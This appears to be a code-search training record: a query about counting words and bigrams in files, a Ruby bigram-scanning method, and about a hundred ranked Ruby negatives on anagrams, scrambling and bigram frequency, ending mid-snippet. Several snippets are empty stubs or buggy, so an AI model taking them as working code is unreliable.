"def compare(word1, word2)\n bigram_compare(bigramate(word1), bigramate(word2))\n end",
"def find_bigrams(str, bigrams)\n bigrams.select { |bigram| str.include?(bigram)}\nend",
"def construct_bigram(title)\n\t#eliminate stop words before creating bigram counts\n\tpattern = /a\\b|an\\b|and\\b|by\\b|for\\b|from\\b|in\\b|of\\b|on\\b|or\\b|out\\b|the\\b|to\\b|with\\b/ #\\b to match the end of the word so it doesnt grab an when the word is and\n\ttitle.gsub!(pattern,\"\")\n\n\ttitle_array = title.split #split the title by words. (splits by spaces by default)\n\n\tfor i in 0..title_array.length-2\n\t\t$bigrams[title_array[i]]\n\t\tif $bigrams[title_array[i]] == nil #when the key/second hash does not exist, create a new one and initialize to 0 so we can increment\n\t\t\t$bigrams[title_array[i]] = Hash.new(0)\n\t\tend\n\t\t#increment value for the key by one\n\t\t$bigrams[title_array[i]][title_array[i+1]] += 1\n\tend\nend",
"def scramble(str1, str2)\n str2.chars.all? { |letter| str1.include?(letter) }\nend",
"def most_frequent_bigram(str)\n bigrams_hash = biagram_hash(str)\n bigrams_hash.key(bigrams_hash.values.max)\nend",
"def scramble_words(words)\n words.split(' ').map { |word| scramble(word) }.join(' ')\nend",
"def scramble(str1, str2)\n found_letters = ''\n str2.chars.each do |letter|\n next unless str1.include?(letter)\n str1.sub!(/#{letter}/, '')\n found_letters << letter\n end\n found_letters == str2\nend",
"def anagrams?(word1, word2)\n if word1.length != word2.length\n return false\n end\n word1.each_char do |ele|\n if !word2.include?(ele)\n return false\n end\n end\n return true\nend",
"def antigram?\n (@first.downcase.gsub(/[^a-z0-9\\s]/i, '').split(\"\") & @second.downcase.gsub(/[^a-z0-9\\s]/i, '').split(\"\")).empty?\n end",
"def most_frequent_bigram(str)\n binaries = [] \n letters = str.split(\"\") #\"thrill\"\n (0...(letters.length-1)).each_with_index do |letter,idx|\n binaries << (letters[idx] + letters[(idx + 1)])\n end\n hash = Hash.new(0)\n binaries.each do |pairs|\n hash[pairs] += 1 \n end\n sorted = hash.sort_by { |k , v| v }\n return sorted[-1][0]\nend",
"def addtoB(title)\n\t#title = \"let's see what this is doing\"\n\tstops = [\" a \", \" an \", \" and \", \" by \", \" for \", \" from \", \" in \", \" of \", \" on \", \" or \", \" out \", \" the \", \" to \", \" width \"] # list of stop words\n\tfor word in stops do # go through the stop words: if they exist in the sentence, we will...\n\t\t\ttitle = title.gsub(word, \" \") # changes word to NOTHING! Well, a space I guess. but still.\n\t\tend\n\n\ttitle_words = title.split(\" \") # splits title into various words\n\n\twhile (title_words.length > 1)\n\t\tfirst_word = title_words[0] # saves the first word to title bigram\n\t\tnext_wrd = title_words[1] # the next word in the title is the one we want to add\n\t\ttitle_words = title_words[1..-1] # chops off the first word and proceeds through\n\n\t\tif ($bigrams.has_key?(first_word)) # if we already have a key, we don't need a new hash\n\t\t\t# do nothing\n\t\telse\n\t\t\t$bigrams[first_word] = Hash.new # if word hasn't been encountered before, give it a new hash\n\t\tend\n\t\t\t\tif ($bigrams[first_word].has_key?(next_wrd)) # if the next word exists for the current word...\n\t\t\t\t\t$bigrams[first_word][next_wrd] = $bigrams[first_word][next_wrd] + 1 # then all we're doing is incrementing the count for that word by one.\n\t\t\t\telse\n\t\t\t\t$bigrams[first_word].merge!(next_wrd => 1) # otherwise, we will set the count of that word to one.\n\t\t\tend\n\t\tend\n\tend",
"def anagrams(str1, str2)\n \nend",
"def anagrams(word1, word2)\n length = word1.length\n if word1.length == word2.length\n array = []\n while length>=0\n array.push(word1[length-1])\n length -= 1\n end\n length2 = word2.length\n while length2 >= 0\n if array.include?(word2[length2 - 1])\n length2 -= 1\n else\n return false\n end\n end\n return true\n else\n return false\n end\nend",
"def longest_bigram(str)\n\tbigram_hash = Hash.new\n bigram_str = str.split(\" \")\n bigram_str.each_with_index do |word, i|\n if i == bigram_str.length - 1\n next\n else\n bigram_hash[word + \" \" + bigram_str[i + 1]] = (word + \" \" + bigram_str[i + 1]).length\n end\n end\n temp_str = \"\"\n temp_str_length = 0\n bigram_hash.keys.each do |compound|\n if compound.length > temp_str_length\n temp_str = compound\n temp_str_length = compound.length\n end\n end\n p temp_str\nend",
"def get_bigrams(string)\n s = string.downcase\n v = []\n (s.length-1).times{ |i|\n v[i] = s[i...i+2]\n }\n return v\n end",
"def anagrams(word, words)\n word = word.chars.sort\n words.select{|x| x.chars.sort == word}\nend",
"def scramble_words(words)\n words.split.map do |word|\n scramble_word(word)\n end.join(' ')\nend",
"def use_bigram(str,i)\n\t\tmax=@han[str[i]][0]\n\t\tif i==0\n\t\t\t@han[str[i]].each{|h|\n\t\t\t\tif ref(\"$\"+h)>ref(\"$\"+max)\n\t\t\t\t\tmax=h\n\t\t\t\tend\n\n\t\t\t}\n\t\telse\n\t\t\t\t@han[str[i]].each{|h|\n\t\t\t\tif ref(str[i-1]+h)>ref(str[i-1]+max)\n\t\t\t\t\tmax=h\n\t\t\t\tend\n\n\t\t\t}\n\t\tend\n\t\treturn max\n\n\tend",
"def scramble(s1,s2)\n pile_of_letters = s1.chars\n target_letters = s2.chars\n target_letters.uniq.all? { |letter| pile_of_letters.count(letter) >= target_letters.count(letter) }\nend",
"def combine_anagrams(words)\r\n\t\r\n\tresult = []\r\n\twords1 = [];\r\n\twords.each {|w| words1 << w.to_s.downcase.chars.sort.join}\r\n\twords2 = words1.uniq\r\n\t\r\n\tfor i in 0 ... words2.size\r\n\t\tr = []\r\n\t\tw2 = words2[i]\r\n\t\tfor j in 0 ... words.size\r\n\t\t\tw = words[j]\r\n\t\t\tif w2.casecmp(w.to_s.downcase.chars.sort.join) == 0\r\n\t\t\t\tr << w\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult << r\r\n\tend\r\n\t\r\n\treturn result\r\n\t\r\nend",
"def matching_bigrams(word1)\n list = @index[word1]\n list.map{ |word2| @table[[word1,word2]] }\n end",
"def scramble(str1, str2)\n str2.chars.all? do |char|\n str1.count(char) >= str2.count(char)\n end\nend",
"def scramble(s1,s2)\n s2.chars.all? { |c| s1.sub!(c, '') }\nend",
"def scramble(s1, s2)\n # p s1.chars.include?(s2)\n p s2.chars.uniq.all?{ |letter| s2.count(letter) <= s1.count(letter) }\nend",
"def anagrams(word, words)\n words.select { |w| w.chars.sort == word.chars.sort }\nend",
"def most_frequent_bigram(str)\n h = Hash.new(0)\n bigrams = (0..str.length-2).map{|i| str[i..i+1]}\n bigrams.each {|bi| h[bi] += 1}\n h.key(h.values.max)\nend",
"def isAntigram(comparedWord)\n String.chars.each(comparedWord)\n end",
"def scramble_words(words)\n first_word = words[0]\n last_word = words[-1]\n alphabetically = words[1, (words.size - 2)].chars.sort\n alphabetically.unshift(first_word).push(last_word).join\nend",
"def anagrams_oneliner(string)\n string.chars.to_a.permutation.map(&:join).select {|value| value != string and WORDS.include? value}\nend",
"def good_bigram?(word)\n return false if REJECT_BIGRAMS.include?(word)\n return false if word.size < 2\n true\n end",
"def mcw(word)\n\tif $bigrams.has_key? word\n\t\tmax = 0\n\t\tkeys = []\n\t\t$bigrams[word].each do |key, count|\n\t\t\tif count > max\n\t\t\t\tkeys = [key]\n\t\t\t\tmax = count\n\t\t\telsif count == max\n\t\t\t\tkeys << key\n\t\t\tend\n\t\tend\n\n\t\tif keys.length > 1\n\t\t\treturn keys[Random.rand(keys.length)]\n\t\telse\n\t\t\treturn keys[0]\n\t\tend\n\tend\n\treturn \"\"\nend",
"def search_for (word)\n\n chars = word.split(\"\")\n all_words = chars.permutation(chars.size).map{|_chars|\n _chars.join \"\"\n }\n\n anagrams = []\n all_words.each do |w|\n anagrams.push w if @word_list[w]\n end\n\n return anagrams\n end",
"def are_anagrams(firstword, secondword)\n firstword.downcase.split(\"\").sort.join == secondword.downcase.split(\"\").sort.join\nend",
"def combine_anagrams(words) \r\n anagrams = words.inject(Hash.new()) do |r, word|\r\n key = word.downcase.chars.sort.join\r\n r[key] ||=[]\r\n r[key] << word\r\n r\r\n end\r\n anagrams.values\r\nend",
"def mcw(search)\n\t\tif !$bigrams.has_key?(search) # if the search word doesn't exist in the bigram...\n\t\t\tmost_common = nil # we're going to return nil.\n\n\t\telse most_common = $bigrams[search].max_by{|word, number| number}[0] # search for max by # of maxes\n\t\tend\n\n\t\treturn most_common\nend",
"def word_unscrambler(str, words)\n str = str.split('').sort.join('')\n possible = []\n words.map do |word|\n sort_word = word.split('').sort.join('')\n possible << word if word_c == str\n end\n return possible\nend",
"def combine_anagrams(words)\n words_uniq = words.map{ |w| w.downcase.split(//).sort.join }.uniq\n words_uniq.map{ |wu| words.select{ |w| w.downcase.split(//).sort.join == wu }}\nend",
"def combine_anagrams(words)\n result = []\n words.each do |word|\n anagrams = words.find_all{|item| item.downcase.chars.sort.join == word.downcase.chars.sort.join }\n result.push(anagrams)\n end\n result.uniq\nend",
"def most_frequent_bigram(str)\n bigram = Hash.new(0)\n (0...str.length).each { |index| bigram[str[index..index+1]] += 1 }\n bigram.key(bigram.values.max)\nend",
"def StringScramble(str1,str2)\n x = str1.chars.sort.join\n y = str2.chars.sort.join\n if x.include?(y)\n \t return true\n else\n return false\n end \nend",
"def scramble(s1,s2)\n s2.chars.uniq.all?{|i| s1.count(i) >= s2.count(i)} \nend",
"def scramble(st1, st2)\n st1_arr = st1.chars\n st2_arr = st2.chars\n st2_arr.all? { |char| st1_arr.count(char) >= st2.count(char) }\nend",
"def most_frequent_bigram(str)\n new_array =[]\n new_arr = []\n hash = {}\n hash = Hash.new {|k, v| hash[k] = 0}\n new_str = str.split(\"\")\n (0...new_str.length).each do |i0|\n (i0...new_str.length).each do |iz|\n pair = new_str[i0..iz]\n new_array << pair\n end\n end\n\n new_array.each do |combined|\n if combined.length == 2\n new_arr << combined \n end\n end\n \n new_arr.each do |pairs| \n hash[pairs] += 1\n end\n \n hash.each {|k, v| return k.join(\"\") if v == hash.values.max}\n\n \nend",
"def combine_anagrams(words)\n result = Array.new\n words.each do |i|\n anagrams = Array.new\n sorted = i.downcase.chars.sort.join\n words.each do |j|\n if j.downcase.chars.sort.join == sorted\n anagrams << j\n end\n end\n result << anagrams\n end\n return result.uniq\nend",
"def most_frequent_bigram(str)\n bigram_hash = Hash.new(0)\n\n (0...str.length - 1).each do |idx|\n bigram_hash[str[idx] + str[idx+1]] += 1\n end\n\n sorted = bigram_hash.sort_by { |k, v| v }\n sorted[-1][0]\nend",
"def word_unscrambler(str, words)\n return words.keep_if {|word| word.chars.sort == str.chars.sort}\nend",
"def most_frequent_bigram(str)\n#grab substrings of length 2\n#hash that contains the substring\n#return key with max value \n\n bigrams = Hash.new(0)\n str.each_char.with_index do |char, i|\n bigrams[str[i..i+1]] += 1 if i + 1 < str.length\n end\n bigrams.max_by { |k,v| v }.first\nend",
"def most_frequent_bigram(str)\n adjacent_letter={}\n letter=\"\"\n (0...str.length-1).each do |i|\n letter=str[i]+str[i+1]\n if adjacent_letter.has_key?(letter)\n adjacent_letter[letter]+=1\n else\n adjacent_letter[letter]=1\n end\n end\n\n max=0\n max_aj=\"\"\n adjacent_letter.each do |k,v|\n if v>max\n max=v\n max_aj=k\n end\n end\n max_aj\n\n\nend",
"def combine_anagrams(words)\n final = []\n first_word = ''\n b = ''\n words.each_with_index do |word_a, i|\n first_word = word_a.downcase.split('').sort\n final << [word_a]\n words.each_with_index do |word_b, j|\n if word_a == word_b\n else\n if first_word == word_b.downcase.split('').sort\n final[i] << word_b\n words.delete(word_b)\n else\n end\n end\n end\n end\n return final\nend",
"def most_frequent_bigram(str)\n bigram_hash = Hash.new(0)\n\n i = 0\n while i < str.length - 1\n bigram_hash[str[i..i+1]] += 1\n i += 1\n end\n\n bigram_hash.max_by {|k, v| v}[0]\nend",
"def anagrams?(word1, word2)\n\nend",
"def anagrams?(word1, word2)\n\nend",
"def most_frequent_bigram(str)\n bigram_count = Hash.new(0)\n\n # count each bigram appearance\n (0...str.length - 1).each do |i|\n bigram = str[i] + str[i+1]\n bigram_count[bigram] += 1\n end\n\n # return most frequent bigram\n bigram_count.max_by { |k, v| v }.first\nend",
"def first_anagram?(word1, word2)\n anagrams = []\n arr = word1.chars \n\n arr.permutation.each do |subArr|\n anagrams << subArr.join(\"\")\n end \n p anagram?(anagrams, word2) \nend",
"def combine_anagrams(words)\n words.group_by {|w| w.downcase.chars.sort {|a,b| a <=> b}.to_s}.values\nend",
"def anagrams?(word1, word2)\n return char_count(word1) == char_count(word2)\nend",
"def anagrams?(word1, word2)\n return char_count(word1) == char_count(word2)\nend",
"def anagrams?(word1, word2)\n return char_count(word1) == char_count(word2)\nend",
"def scramble(s1,s2)\n s2.chars.uniq.each { |letter| return false unless s1.count(letter) >= s2.count(letter) }\n true\nend",
"def anagrams(word, words)\n p words.select {|x| x.chars.sort == word.chars.sort }\nend",
"def antigrams?\n chars1 = @input1.downcase.gsub(/[!@#$%^&*()-=_+|;':\",.<>?']/, '').split(\"\").sort\n chars2 = @input2.downcase.gsub(/[!@#$%^&*()-=_+|;':\",.<>?']/, '').split(\"\").sort\n if\n chars1.any? {|chars1| chars2.include?(chars1)}\n return false\n else\n return true\n end\n end",
"def combine_anagrams(words)\n anagrams = Hash.new()\n words.each do |word|\n letters = word.downcase.gsub(/[^a-z]/, \"\").split(\"\").sort.join\n anagrams[letters] = Array.new unless anagrams.include?(letters)\n anagrams[letters] << word\n end\n anagrams.values\nend",
"def anagrams?(word1, word2)\n return char_count(word1) == char_count(word2)\nend",
"def anagrams?(word1, word2)\n return char_count(word1) == char_count(word2)\nend",
"def string_scramble(str1, str2)\r\n str2.chars.all? { |x| str1.count(x) >= str2.count(x) }\r\nend",
"def most_frequent_bigram(str)\n pairs = Hash.new(0)\n str.each_char.with_index do |letter, indx|\n if indx != str.length-1\n pair = letter + str[indx+1]\n end\n pairs[pair] += 1\n end\n pairs.key(pairs.values.max)\nend",
"def combine_anagrams(words)\r\n\tswords = Array.new\r\n\tnoDups = Array.new\r\n\tgroupWords = Array.new\r\n\tanagrams = Array.new\r\n\twords.each {|word| swords << word.downcase.chars.sort.join}\r\n\tswords.each{|word| noDups << word unless !noDups.index(word).nil? }\r\n\tnoDups.each do|tword|\r\n\t\t\t\t\t\r\n\t\t\t\t\tgroupWords = Array.new\r\n\t\t\t\t\twords.each {|word| groupWords << word unless word.downcase.chars.sort.join != tword}\r\n\t\t\t\t\tanagrams << groupWords\r\n\t\t\t\tend\r\n\t\t\t\t\r\n\treturn anagrams\r\nend",
"def scramble(str1, str2)\n str1_chars = str1.chars\n str2_chars = str2.chars\n\n str2_chars.all? do |char|\n str1_chars.count(char) >= str2_chars.count(char)\n end\nend",
"def word_unscrambler(str, words)\n str_letters = str.split(\"\").sort\n\n res = []\n words.each do |word|\n word_letters = word.split(\"\").sort\n res << word if str_letters == word_letters\n end\n\n res\nend",
"def anagrams?(word1, word2)\r\n return charCount(word1) == charCount(word2)\r\nend",
"def combine_anagrams(words)\n\th = Hash.new{|hash, key| hash[key] = Array.new;}\n\twords.each do |word| h[word.downcase.split(//).sort.join] << word end\n\th.values \nend",
"def most_frequent_bigram(str)\n bigrams = Hash.new(0)\n\n i = 0\n while i < str.length - 1\n bigrams[str[i..i+1]] += 1 \n i += 1\n end\n\n max_num = 0\n max = nil\n\n bigrams.each do |k,v|\n if v > max_num\n max_num = v\n max = k\n end\n end\n max\nend",
"def anagramI?(str1, str2)\n anagrams = str1.split(\"\").permutation.to_a.map { |anagram| anagram.join(\"\") }\n anagrams.include?(str2)\nend",
"def find_anagrams(base, words_list)\n words_list.select { |word| word.split('').sort == base.split('').sort }\nend",
"def find_anagrams(base, words_list)\n words_list.select { |word| word.split('').sort == base.split('').sort }\nend",
"def combine_anagrams(words)\n anagrams = []\n available_words = words\n words.each do |e|\n group = []\n temp_words = []\n anagram_invariant = e.downcase.chars.sort.join\n available_words.each do |i|\n test = i.downcase.chars.sort.join\n if test == anagram_invariant\n group.push(i)\n else\n temp_words.push(i)\n end\n end\n if(!group.empty?)\n anagrams.push(group)\n end\n available_words = temp_words\n end\n return anagrams\nend",
"def StringScramble(str1,str2)\n\n a_str1 = str1.split(\"\")\n a_str2 = str2.split(\"\")\n count = 0 \n \n a_str2.each do |letter|\n if a_str1.include?(letter)\n count += 1\n end\n end\n \n return count == a_str2.length ? true : false\n \nend",
"def first_anagram(word1, word2) #the worst \r\n word1.chars.permutation.to_a.any? { |sub| sub.join == word2 } \r\nend",
"def most_frequent_bigram(str)\n sub_str_arr = []\n bigram_count = Hash.new(0)\n str.each_char.with_index do |char,idx|\n if idx+1 != nil && str[idx..idx+1].length ==2\n sub_str_arr << str[idx..idx+1]\n end\n end\n sub_str_arr.each {|bigram| bigram_count[bigram]+=1}\n \n sorted = bigram_count.sort_by {|key,value| value}\n sorted [-1][0]\n\n\nend",
"def most_frequent_bigram(str)\n n, hash, res, ct = str.length, Hash.new(0), \"\", 0\n (0...n).each do |i|\n break if i + 2 > n\n w = str[i..(i + 1)]\n hash[w] += 1\n if(ct < hash[w])\n ct = hash[w]\n res = w\n end\n end\n res\nend",
"def gen_bigrams(a)\n bigrams = a.zip(a[1..-1])\n bigrams.pop # remove last useless one [lastitem, nil]\n return bigrams\nend",
"def most_frequent_bigram(str)\n bigrams = Hash.new(0)\n (0...str.length-1).each{|i| bigrams[ str[i..i+1] ] += 1}\n max = bigrams.first[0] # Hash#first returns first key value pair in an array\n bigrams.each {|key,val| max = key if val > bigrams[max]}\n # bigrams.sort_by{|b, v| v}.last[0]\n max\nend",
"def combine_anagrams(words)\r\n hash = Hash.new([])\r\n anagrams = []\r\n words.each do |word|\r\n keyword = word.downcase.chars.sort.join\r\n hash[keyword] += [word]\r\n end\r\n hash.each_value do |words|\r\n anagrams += [words]\r\n end\r\n return anagrams\r\nend",
"def combine_anagrams(words)\r\n words.group_by{|w| w.downcase.chars.sort.to_s}.values\r\nend",
"def create_title(word)\n\tcurrent = word\n\tword_num = 1 # begin word number at one\n\ttitle = \"\" # title begins as empty\n\ttitle += word # add current word\n\twhile word_num !=20 # while we have less than 20 words...\n\t\t\tif ($bigrams.has_key?(current)) # if the word exists in the bigram\n\t\t\t\tif (mcw(current) == nil)\n\t\t\t\t\t# do nothing and exit\n\t\t\t\t\tword_num = 20\n\t\t\t\telse\n\t\t\t\t\taddition = mcw(current) # thing to add is mcw\n\t\t\t\t\ttitle += \" \" # add space for readability\n\t\t\t\t\ttitle += addition # add addition to the title\n\t\t\t\t\tcurrent = addition # set current to the new wordtitle += addition # add the mcw\n\t\t\t\t\tword_num += 1 # increment by one and then go throuh\n\t\t\t\tend\n\t\t\telse word_num = 20 # otherwise, we exit\n\t\t\tend\n\t\tend\n\t\treturn title\nend",
"def anagrams?(word1, word2)\n\treturn char_count(word1) == char_count(word2)\n \nend",
"def anagrams?(word1, word2)\n\treturn hashLetters(word1) == hashLetters(word2)\nend",
"def scramble_words(chars = WordChars)\n\t\tgsub(/(#{chars})(#{chars}+)(?=#{chars})/) { $1 + $2.randomize }\n\tend",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n str.each_char.with_index do |char, idx|\n key = char + str[idx + 1] if idx < str.length - 1\n hash[key] += 1\n end\n\n hash.key(hash.values.max)\nend",
"def combine_anagrams(words)\n\twords.collect do |w|\n\t\twords.find_all { |w2| w.split(//).sort.eql? w2.split(//).sort }.sort.uniq\n\tend.uniq\nend",
"def combine_anagrams(words)\n\n\twords.group_by{|word| word.downcase.chars.sort}.values\n\t\nend",
"def making_anagrams(string1, string2)\n matching_chars = 0\n visited_chars = Hash.new\n \n longest_string = string1.length > string2.length ? string1 : string2\n \n longest_string.each_char do |ch|\n if visited_chars[ch]\n next\n else\n visited_chars[ch] = true\n matching_chars += [string1.count(ch), string2.count(ch)].min\n end\n end\n \n string1.length + string2.length - matching_chars * 2\nend",
"def combine_anagrams(words)\n\t[] unless words.empty?\n\tcombine = Hash.new\n\twords.each do |word|\n\t\tsorted = word.downcase.chars.sort.join\n\t\tif combine.has_key?(sorted)\n\t\t\tcombine[sorted] << word\n\t\telse\n\t\t\tcombine[sorted] = [word]\n\t\tend\t\n\tend\n\tcombine.values\nend",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n str.each_char.with_index do |char, idx|\n hash[str[idx..idx+1]] += 1\n end\n max = 0\n max_bigram = \"\"\n hash.each_pair do |key, value|\n if value > max\n max_bigram = key\n max = value\n end\n end\n return max_bigram\nend",
"def combine_anagrams(words)\n words_hash = Hash.new{ |hash, key| hash[key] = [] }\n words.each { |word| word_key = word.downcase.chars.sort.join; words_hash[word_key] = words_hash[word_key] << word; }\n words_list = Array.new()\n words_hash.keys.each { |key| words_list << words_hash[key] }\n return words_list\nend",
"def pig_it_ms_two(str)\n pig = []\n str.split.each do |w|\n pig << w.chars.rotate.join + \"ay\" if w =~ /\\w/\n pig << w if w =~ /\\W/\n end\n pig.join(\" \")\nend",
"def combine_anagrams(words)\n Array anagrams = []\n words.each {|x|\n flag = false\n anagrams.collect {|y|\n if x.downcase.chars.to_a.sort == y[0].downcase.chars.to_a.sort then\n y << x\n flag = true\n break\n end\n }\n unless flag; anagrams << [x] end \n }\n anagrams\nend",
"def check_anagrams(first_words, second_words)\n first_words.each_with_index do |word, index|\n if word.split('').sort == second_words[index].split('').sort\n puts true\n else\n puts false\n end\n end\nend",
"def combine_anagrams(words)\n groups = Hash.new\n words.each do |word|\n (groups[word.downcase.chars.sort.join] ||= []) << word\n end\n groups.flatten.values_at(* groups.flatten.each_index.select {|i| i.odd?})\nend"
] | [
"0.74516493",
"0.7052047",
"0.6946647",
"0.6575785",
"0.6469979",
"0.631926",
"0.6299341",
"0.6281823",
"0.62817293",
"0.62425333",
"0.6229352",
"0.62130743",
"0.6211819",
"0.6171229",
"0.6164704",
"0.6155376",
"0.61261",
"0.6066925",
"0.606135",
"0.6058965",
"0.6058319",
"0.60513663",
"0.60434484",
"0.60297346",
"0.60222405",
"0.6014891",
"0.600631",
"0.6003527",
"0.6002725",
"0.5997071",
"0.59935856",
"0.5979452",
"0.59788907",
"0.5971336",
"0.5964855",
"0.5958162",
"0.5955581",
"0.5954827",
"0.5953136",
"0.59483",
"0.5923533",
"0.59189284",
"0.5918547",
"0.5918188",
"0.5917184",
"0.5904928",
"0.5897972",
"0.58977115",
"0.5897609",
"0.58954495",
"0.58935046",
"0.58786726",
"0.5876727",
"0.5876727",
"0.58737105",
"0.5867961",
"0.5856658",
"0.5856003",
"0.5856003",
"0.5856003",
"0.5849327",
"0.5844352",
"0.58382666",
"0.5836301",
"0.5836015",
"0.5836015",
"0.58326626",
"0.5825694",
"0.5820862",
"0.58202946",
"0.5813009",
"0.58127105",
"0.5811404",
"0.5810008",
"0.58070403",
"0.5797964",
"0.5797964",
"0.5797573",
"0.5794222",
"0.57891643",
"0.57842255",
"0.57814896",
"0.5780216",
"0.57769847",
"0.57751375",
"0.57721585",
"0.5770621",
"0.5767358",
"0.5763367",
"0.57632375",
"0.5762269",
"0.57618284",
"0.57386583",
"0.57349217",
"0.57309127",
"0.5730163",
"0.57300186",
"0.5729347",
"0.57249683",
"0.57223684",
"0.5718432"
] | 0.0 | -1 |
Sace file counting words and bigrams. | def scan
$stderr.print "[bigrams] "
last = nil
bigram_files.each do |file|
$stderr.print "."
text = File.read(file).gsub("\n", " ")
states = text.split(/[.,:;?!()"]\s*/)
states.each do |state|
state.scan(WORD) do |word|
word = normalize(word)
if valid_word?(word)
if last && good_bigram?(word)
add(last, word, file)
end
last = word
else
last = nil
end
end
last = nil
end
last = nil
end
$stderr.puts
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def word_count_a_file(file_path)\nend",
"def word_count_a_file(file_path)\n word_count = 0\n f = File.open(file_path, \"r\")\n f.each_line {|line|\n word_count += line.to_s.split.size\n }\n word_count\nend",
"def word_count_a_file(file_path)\n\tfile = File.new(file_path,'r')\n\tfile.read.count(\" \")+1 \nend",
"def count_danger_dave_faults\n danger_dave_es = '/Users/michael/Desktop/language_files/danger_dave_inflection_freqs/content/2016/es/es_full.txt'\n bw_count = File.new('./bw_count.txt', 'w+')\n not_found_count = File.new('./not_found_count.txt', 'w+')\n File.readlines(danger_dave_es).each do |word_n_freq|\n if $. == 100\n break\n end\n word_n_freq_arr = word_n_freq.split(' ')\n word = word_n_freq_arr[0]\n hit_count = word_n_freq_arr[1]\n bw_exists = BaseWord.find_by(base_word: word)\n # headers for bw_count file: base_word, hit_count, (inflection), base_word_id\n # headers for not_found_count file: inflection, hit_count\n if bw_exists\n bw_count.puts word + ' ' + hit_count + ' ' + '(' + word + ')' + ' ' + bw_exists.id\n else\n inflection_exists = Inflection.find_by(word: word)\n if inflection_exists\n bw_id = inflection_exists.base_word_id\n bw = BaseWord.find(bw_id).base_word\n bw_count.puts base_word + ' ' + hit_count + ' ' + '(' + word + ')' + ' ' + bw_id\n else\n not_found_count.puts word + ' ' + hit_count\n end\n end\n end\nend",
"def file_reader file_name\n @words_count = {}\n File.read(file_name).each_line{ |line| count_words( line.split(',')[2] ) }\n hash_to_file(@words_count, file_name)\nend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tall = Hash.new\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# do something for each line\n\t\t\ttitle = cleanup_title(line)\n\t\t\tunless title.nil?\n\t\t\t\tgram = title.split().each_cons(2).to_a\n\t\t\t\tgram = gram.map{ |n| n.join(' ') }\n \t\t\t\tgram = gram.each_with_object(Hash.new(0)) { |word, obj| obj[word] += 1 }\n \t\t\t\tif gram.any?\n\t \t\t\t\tall.merge!(gram) { |k, old, new| old + new }\n\t \t\t\tend\n\t\t\tend\n\t\tend\n\t\t$bigramsArray = all.sort_by { |k, v| -v }\n\t\tcreate_hash()\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def process\n tokenize(text).each do |word|\n token = TfIdfSimilarity::Token.new word\n if token.valid?\n @term_counts[token.lowercase_filter.classic_filter.to_s] += 1\n end\n end\n @size = term_counts.values.reduce(:+)\n end",
"def generate_counts(data)\n counts = {}\n data.each do |line|\n unigram = nil\n bigram = nil\n trigram = nil\n\n # prepend buffering ghost values so we can represent trigrams of the first word\n tokens = line.split(' ')\n\n # take a sliding window of the entire line, generating grams as we go\n (1..(tokens.size-1)).to_a.each do |i|\n unigram = tokens[i..i]\n bigram = tokens[i-1..i]\n trigram = tokens[i-2..i]\n\n counts.store(unigram, counts.fetch(unigram, 0) + 1)\n counts.store(bigram, counts.fetch(bigram, 0) + 1)\n counts.store(trigram, counts.fetch(trigram, 0) + 1)\n end\n end\n counts\nend",
"def word_count_a_file(file_path)\n total = 0\n file = File.new(file_path, \"r\")\n file.readlines.each do |x|\n total += x.split.size\n end\n total\nend",
"def word_count(file)\n wc = Hash.new(0)\n File.open(file, 'r') do |f|\n f.each_line do |line|\n line.split.each do |word|\n word = word.gsub(/[^a-zA-Z]/, '').downcase\n wc[word.to_sym] += 1\n end\n end\n end\n wc\nend",
"def lexigram_counter(sequencetext)\n @sequencetext = sequencetext\n\t@lexigrams = lexigram_searcher(@sequencetext)\n\tif (@lexigrams === [\"no letters remain after processing\"])\n\t @lexigrams_count = 0\n else\n @lexigrams_count = @lexigrams.count.to_s\n end\n end",
"def word_count_a_file(file_path)\n File.read(file_path).split(' ').length\n # had to create the file, text taken from https://www.lipsum.com/feed/html\nend",
"def process_words\n reset_counts\n # iterate through radlib_array and add counts\n self.each do |w|\n Rails.logger.debug(w.inspect)\n case w[\"type\"]\n when \"word\"\n @num_words += 1\n if w[\"selectable\"] && w[\"selected\"]\n @num_blanks += 1\n # fix for old radlibs\n unless w[\"user_pos\"]\n w[\"user_pos\"] = w[\"predicted_pos\"]\n end\n type = w[\"user_pos\"].gsub(\"-\", \"_\").to_sym\n Rails.logger.debug(type)\n @num_blanks_by_type[type] += 1\n end\n when \"whitespace\"\n # don't need to do anything here\n when \"punc\"\n @num_sentences += 1 if w[\"text\"] == \".\" || w[\"text\"] == \"!\" || w[\"text\"] == \"?\"\n end\n end\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\tbegin\n\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\t\t\t\t\t\t\t\t\t\t\t\t\t#for each line\n\t\t\ttitle = cleanup_title(line)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#clean up title\n\t\t\tif title != nil\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#unless the title doesnt exist\n\t\t\t\twords = title.split(/\\s/)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#split the title into seperate words and remove all the stop words mentioned in the lab\n\t\t\t\twords.delete(\"a\")\n\t\t\t\twords.delete(\"an\")\n\t\t\t\twords.delete(\"and\")\n\t\t\t\twords.delete(\"by\")\n\t\t\t\twords.delete(\"for\")\n\t\t\t\twords.delete(\"from\")\n\t\t\t\twords.delete(\"in\")\n\t\t\t\twords.delete(\"of\")\n\t\t\t\twords.delete(\"on\")\n\t\t\t\twords.delete(\"or\")\n\t\t\t\twords.delete(\"out\")\n\t\t\t\twords.delete(\"the\")\n\t\t\t\twords.delete(\"to\")\n\t\t\t\twords.delete(\"with\")\n\t\t\t\t(0..words.size-2).each do |i|\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# for the size of the words array minus two because we dont want to check bigrams of the last word\n\t\t\t\t\tif $bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"].nil?\t\t\t\t\t\t\t\t\t\t#if the first layer doesnt contain the current word, add it with it's following word with a value of 